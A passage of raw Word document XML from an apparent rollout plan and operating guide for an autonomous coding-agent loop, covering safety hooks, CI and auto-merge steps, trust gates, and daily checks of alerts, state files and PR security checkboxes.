                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/plan-task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/verify-acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The quality gates. Promoted forward.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>phi-scan.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>guard-destructive.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> are safety-critical.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Manual loop test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>claude /loop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> interactively on one P0 task.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/await-ci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/auto-merge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Close the autonomous loop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>First single-lane autonomous run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>P0-04 Alembic. Let the loop ship it end-to-end.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Worktrees + lane-tagging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Only after step 9 succeeds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Monitor cron + alerts.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The safety net.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Daily digest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Quality-of-life on top.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Two-lane operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Only after a single lane has shipped 2–3 PRs cleanly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D9DDE5"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D9DDE5"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D9DDE5"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D9DDE5"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust gates:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Steps 9 and 13 are the trust gates. Don't skip them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>17. Operating notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>When you sit down in the morning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>digests/YYYY-MM-DD.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (latest) for yesterday's summary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/state/alerts.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for anything the bot couldn't handle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEF2"/>
        </w:rPr>
        <w:t>.claude/state/in-flight.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what each lane is on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Scan PR list — anything with unticked security checkboxes needs review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If everything's green, the loop has nothing new for you. That's the intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>When a permission prompt fires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
